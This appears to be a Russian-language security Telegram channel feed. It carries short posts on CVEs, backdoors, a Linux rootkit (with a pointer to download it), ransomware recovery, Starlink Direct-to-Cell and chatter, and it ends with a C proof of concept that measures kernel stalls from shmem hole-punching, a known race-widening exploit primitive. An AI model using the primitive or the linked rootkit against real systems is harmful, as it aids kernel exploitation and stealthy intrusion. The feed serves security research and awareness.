Извлечение данных из WhatsApp
*
READ

CVE-2025-66478 Next.js-RSC-RCE
*
Добавили Runtime Memory Shell

Прочитал тут у одного канадца:
After days of monitoring the Starlink V2 Mini DTC emissions on ~2010.5MHz, I deployed the 1.8m dish to track a number of the objects this morning. Here's STARLINK-11321 emitting broadband data (4.5MHz) centred on ~1992.5MHz. Every Starlink DTC object I tracked emitted similarly.
*
Чьто это значит ?
Значит что Starlink V2 Mini с Direct-To-Cell уже реально и активно шпарят в районе 2 ГГц, как настоящие космические базовые станции LTE/5G.
DTC = Direct-to-Cell – это полезная нагрузка Starlink, которая напрямую работает с обычными телефонами (через частоты сотовых операторов, тарелку можно не покупать).
А еще там есть S-band, область вокруг 2 ГГц, которую Starlink и купил/арендует под Direct-to-Cell (PCS G, AWS-4 и т.п.) для работы с обычными телефонами.
Ну короче, выглядит это как ранняя эксплуатация космических сот, мобила по прежнему думает, что коннектит к базовой станции - а по факту это спутник.
Круто !

BRICKSTORM Backdoor

PDF

#malware #nsa #china

Kubernetes v1.35 Release Approaching (Expected Dec 17, 2025): The next major version includes 17 security changes, such as new validations, deprecation of older features like cgroup v1 and IPVS mode, in-place pod resizing, and improved stability. A sneak peek highlights trims to legacy components like Ingress NGINX shifting to HAProxy.
*
Тем кто до сих пор сидит на 1.26–1.28 ветках - будет очень больно.

Singularity - Stealthy Linux Kernel Rootkit
*
каков зверек !
И EDR обходит и eBPF
*
read FULL Research
*
Ну и скачать сам RootKit

В РФ запущена облачная платформа квантовых вычислений Bauman Octillion
она открыта для всех исследователей
*
Думаю, пойду гляну, для всех же !
*
Квантовый браузер наверно нужен, квантовый компутир, провайдер и я сам квантовый, ну что за херня ((((

Chinese Malware Delivery Domains
Хорошая серия, для понимания как работают в азии.
*
read

must have, надо брать )))

Ransomware recovery wiki
*
шаг влево, шаг вправо - уже не спасает, но общие рекомендации остаются такие же.
Исходя из подобных вики, рансом группы как раз таки и меняют свой подход, лейте больше )))

ДОброго утра
выпьем КРЕПКОГО кофе ? ДА

блин я не хнаю что чс этим деоать ))))))

аонимаю, кот , ужасен)))))

котька
собирает миллионы

опасен

CVE-2025-64669 Windows Admin Center
*
Uncovering Local Privilege Escalation

all in one

Fantastic Rootkits: и где их найти
*
(Part 1)

The FreePBX Rabbit Hole: CVE-2025-66039 и все все все
*
Глубокий анализ

Ubuntu 25.04 (ядро 6.14.11)
минимальный POC
What ?

#define _GNU_SOURCE
#include <sys/mman.h>
#include <fcntl.h>
#include <stdio.h>
#include <linux/falloc.h>
#include <err.h>
#include <pthread.h>

#define SYSCHK(x) ({            \
    typeof(x) __res = (x);      \
    if (__res == (typeof(x))-1) \
      err(1, "SYSCHK(" #x ")"); \
    __res;                      \
})

#define FALLOC_LEN 64 * 1024 * 1024 // Max on Ubuntu 25.04

pthread_barrier_t barrier;
int ffd;
char *fmap;

void hole_punch() {
    SYSCHK(ffd = open("/dev/shm/", O_TMPFILE | O_RDWR, 0666));
    SYSCHK(fallocate(ffd, 0, 0, FALLOC_LEN));
    SYSCHK(fmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, ffd, 0));

    pthread_barrier_wait(&barrier); // barrier 1
    SYSCHK(fallocate(ffd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, FALLOC_LEN));
}

int main(void) {
    pthread_barrier_init(&barrier, NULL, 2);

    pthread_t hole_punch_thread;
    SYSCHK(pthread_create(&hole_punch_thread, NULL, (void*)hole_punch, NULL));

    struct timespec start, end;
    pthread_barrier_wait(&barrier); // barrier 1

    clock_gettime(CLOCK_MONOTONIC, &start);
    volatile char dummy = *(char *)fmap; // Simulated kernel access during hole punch
    clock_gettime(CLOCK_MONOTONIC, &end);

    long long stall_ns = (end.tv_sec - start.tv_sec) * 1000000000LL + (end.tv_nsec - start.tv_nsec);

    printf("Stall time: %lld ns\n", stall_ns);
}